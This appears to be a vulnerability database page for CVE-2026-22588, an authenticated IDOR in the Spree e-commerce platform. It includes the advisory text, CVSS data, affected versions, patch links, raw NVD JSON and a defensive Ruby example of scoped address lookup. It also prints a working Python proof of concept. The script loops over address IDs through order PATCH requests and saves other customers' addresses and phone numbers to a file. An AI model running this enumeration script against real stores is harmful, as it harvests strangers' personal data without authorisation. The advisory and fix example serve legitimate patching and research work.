Security Vulnerability Report
CVE-2026-22588 CVSS 6.5 MEDIUM

CVE-2026-22588

Published: 2026-01-08 21:15:45
Last Modified: 2026-02-02 16:14:34

Description

Spree is an open source e-commerce solution built with Ruby on Rails. Prior to versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5, an Authenticated Insecure Direct Object Reference (IDOR) vulnerability was identified that allows an authenticated user to retrieve other users’ address information by modifying an existing order. By editing an order they legitimately own and manipulating address identifiers in the request, the backend server accepts and processes references to addresses belonging to other users, subsequently associating those addresses with the attacker’s order and returning them in the response. This issue has been patched in versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5.
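As an added defender-side illustration (not Spree's code and not the linked patch commits), the lookup pattern that produces this kind of IDOR next to the ownership-scoped lookup that closes it, modelled with plain Ruby objects instead of ActiveRecord; all names and the sample data are hypothetical:

```ruby
# Added illustrative example (not Spree's code): the unscoped address lookup
# behind an order-update IDOR, beside the ownership-scoped lookup that fixes
# it. Plain Ruby objects stand in for ActiveRecord; names are hypothetical.

Address = Struct.new(:id, :user_id, :address1, :city)
Order   = Struct.new(:id, :user_id, :bill_address_id, :ship_address_id)

class NotAuthorized < StandardError; end

# Constructed sample data: two users, each owning one address.
ADDRESSES = [
  Address.new(1, 100, "1 Example St", "Atown"),
  Address.new(2, 200, "2 Sample Ave", "Btown"),
].freeze

ADDRESS_KEYS = %i[bill_address_id ship_address_id].freeze

# Vulnerable pattern: the address is resolved by id alone, so the order's
# owner can attach any existing address, including another user's, and the
# order response then serialises that address back to them.
def update_order_unscoped(order, params)
  ADDRESS_KEYS.each do |key|
    next unless params.key?(key)
    addr = ADDRESSES.find { |a| a.id == params[key] }
    raise ArgumentError, "address #{params[key]} not found" unless addr
    order[key] = addr.id
  end
  order
end

# Hardened pattern: resolve the id only within the addresses owned by the
# order's user. A foreign id is handled exactly like a non-existent one, so
# the response does not even reveal whether the id exists.
def update_order_scoped(order, params)
  owned = ADDRESSES.select { |a| a.user_id == order.user_id }
  ADDRESS_KEYS.each do |key|
    next unless params.key?(key)
    addr = owned.find { |a| a.id == params[key] }
    raise NotAuthorized, "address #{params[key]} is not available to this user" unless addr
    order[key] = addr.id
  end
  order
end

# The address an order response would include for the billing slot.
def address_in_response(order)
  ADDRESSES.find { |a| a.id == order.bill_address_id }
end
```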

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:* (Spree < 4.10.2) - VULNERABLE
cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:* (Spree >= 5.0.0, < 5.0.7) - VULNERABLE
cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:* (Spree >= 5.1.0, < 5.1.9) - VULNERABLE
cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:* (Spree >= 5.2.0, < 5.2.5) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-22588 IDOR PoC - Spree Address Enumeration
# This PoC demonstrates how an authenticated user can access other users' addresses
import requests
import json

TARGET_URL = "https://vulnerable-spree-site.com"
ATTACKER_TOKEN = "attacker_auth_token_here"


def get_order_id(session):
    """Get the attacker's first order ID"""
    headers = {"Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json"}
    response = session.get(f"{TARGET_URL}/api/v2/storefront/orders", headers=headers)
    orders = response.json().get('data', [])
    if orders:
        return orders[0]['id']
    return None


def enumerate_addresses(session, order_id, start_id=1, end_id=1000):
    """Enumerate other users' addresses by manipulating address_id parameter"""
    headers = {"Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json"}
    exposed_addresses = []
    for addr_id in range(start_id, end_id + 1):
        # Attempt to associate other user's address with attacker's order
        payload = {
            "order": {
                "bill_address_id": addr_id,
                "ship_address_id": addr_id
            }
        }
        response = session.patch(
            f"{TARGET_URL}/api/v2/storefront/orders/{order_id}",
            headers=headers,
            json=payload
        )
        if response.status_code == 200:
            order_data = response.json()
            # Check if address was successfully associated (IDOR successful)
            if 'included' in order_data and order_data['included']:
                addr_data = order_data['included'][0]
                if 'attributes' in addr_data:
                    attrs = addr_data['attributes']
                    exposed_addresses.append({
                        "address_id": addr_id,
                        "address1": attrs.get('address1'),
                        "city": attrs.get('city'),
                        "zipcode": attrs.get('zipcode'),
                        "phone": attrs.get('phone')
                    })
                    print(f"[+] Exposed Address ID {addr_id}: {attrs}")
    return exposed_addresses


def main():
    session = requests.Session()
    # Step 1: Get attacker's order ID
    order_id = get_order_id(session)
    if not order_id:
        print("[-] Failed to obtain order ID")
        return
    print(f"[+] Obtained Order ID: {order_id}")
    # Step 2: Enumerate addresses (adjust range as needed)
    print("[*] Starting address enumeration...")
    addresses = enumerate_addresses(session, order_id, 1, 100)
    print(f"\n[+] Total exposed addresses: {len(addresses)}")
    # Step 3: Save results
    with open('exposed_addresses.json', 'w') as f:
        json.dump(addresses, f, indent=2)


if __name__ == "__main__":
    main()
```

References

https://github.com/spree/spree/commit/02acabdce2c5f14fd687335b068d901a957a7e72 (Patch)
https://github.com/spree/spree/commit/17e78a91b736b49dbea8d1bb1223c284383ee5f3 (Patch)
https://github.com/spree/spree/commit/b409c0fd327e7ce37f63238894670d07079eefe8 (Patch)
https://github.com/spree/spree/commit/d3f961c442e0015661535cbd6eb22475f76d2dc7 (Patch)
https://github.com/spree/spree/security/advisories/GHSA-g268-72p7-9j6j (Exploit, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-22588",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-08T21:15:44.560",
    "lastModified": "2026-02-02T16:14:33.957",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Spree is an open source e-commerce solution built with Ruby on Rails. Prior to versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5, an Authenticated Insecure Direct Object Reference (IDOR) vulnerability was identified that allows an authenticated user to retrieve other users’ address information by modifying an existing order. By editing an order they legitimately own and manipulating address identifiers in the request, the backend server accepts and processes references to addresses belonging to other users, subsequently associating those addresses with the attacker’s order and returning them in the response. This issue has been patched in versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5."
      },
      {
        "lang": "es",
        "value": "Spree es una solución de comercio electrónico de código abierto construida con Ruby on Rails. Antes de las versiones 4.10.2, 5.0.7, 5.1.9 y 5.2.5, se identificó una vulnerabilidad de Referencia Directa Insegura a Objeto Autenticada (IDOR) que permite a un usuario autenticado recuperar la información de dirección de otros usuarios modificando un pedido existente. Al editar un pedido que poseen legítimamente y manipular los identificadores de dirección en la solicitud, el servidor de backend acepta y procesa referencias a direcciones que pertenecen a otros usuarios, asociando posteriormente esas direcciones con el pedido del atacante y devolviéndolas en la respuesta. Este problema ha sido parcheado en las versiones 4.10.2, 5.0.7, 5.1.9 y 5.2.5."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-639"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "4.10.2",
                "matchCriteriaId": "B265915C-3AA8-4B6C-9794-DA08F6359D31"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "5.0.0",
                "versionEndExcluding": "5.0.7",
                "matchCriteriaId": "C6C152A8-FCA5-4420-A138-E09B27970EE4"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "5.1.0",
                "versionEndExcluding": "5.1.9",
                "matchCriteriaId": "54EEC933-938E-404B-A87B-3771931D5E23"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "5.2.0",
                "versionEndExcluding": "5.2.5",
                "matchCriteriaId": "1C6D055D-A9A8-46E1-A16C-FE17B66E800B"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/spree/spree/commit/02acabdce2c5f14fd687335b068d901a957a7e72",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/spree/spree/commit/17e78a91b736b49dbea8d1bb1223c284383ee5f3",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/spree/spree/commit/b409c0fd327e7ce37f63238894670d07079eefe8",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/spree/spree/commit/d3f961c442e0015661535cbd6eb22475f76d2dc7",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/spree/spree/security/advisories/GHSA-g268-72p7-9j6j",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```